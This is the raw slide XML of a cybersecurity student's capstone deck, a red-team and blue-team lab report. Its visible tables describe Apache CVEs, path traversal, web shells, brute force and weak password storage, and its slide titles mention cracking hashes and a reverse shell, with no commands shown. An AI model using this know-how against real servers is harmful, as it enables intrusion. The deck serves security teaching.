                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-553</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" i="1"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800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A possible shell file exists in /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" i="0" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>cgi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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 sz="800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows for execution of scripts on the webserver that will compromise said server and information contained</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Compromises: Confidentiality, Intergrity, Availability</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="939344">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CVE-2019-0211</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter).</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1372904">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CVE-2021-41773</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Compromises Confidentiality, Integrity, Availability</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" i="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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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83" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2485247727"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="484908" y="1201901"/>
          <a:ext cx="8344740" cy="3510521"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{FFF4F696-85C8-45BD-83F6-7E31E192685C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2781580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2781580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2781580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="340332">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680691">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-799</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" i="1" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An authentication routine might not limit the number of times an attacker can BRUTE force a password</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="811598">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-548</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1073412">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-312</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="498702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CWE-256</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Storing a password in plaintext may result in a system compromise</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. </a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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895967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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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83" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3405645385"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="554635" y="1201901"/>
          <a:ext cx="8104455" cy="3550208"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{FFF4F696-85C8-45BD-83F6-7E31E192685C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1660391">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3222032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3222032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="518548">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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1675395">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" i="1" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-328</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" i="1" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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800" b="0" i="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a "rainbow table" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" i="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1356265">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-308</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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lgn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng" algn="ctr">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800" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng" algn="ctr">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800" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="0" dirty="0">
                        <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">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lgn="ctr">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82577597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2480</TotalTime>
  <Words>2878</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>375</Paragraphs>
  <Slides>27</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Roboto Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System Report: Leon Scott</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: [Portscan &amp; Directory Transversal]</vt:lpstr>
      <vt:lpstr>Exploitation: [Directory Transversal - Continued]</vt:lpstr>
      <vt:lpstr>Exploitation: [Breaking Password Hash]</vt:lpstr>
      <vt:lpstr>Exploitation: [Establishing the Reverse Shell]</vt:lpstr>
      <vt:lpstr>Exploitation: [Shell access to the web server]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
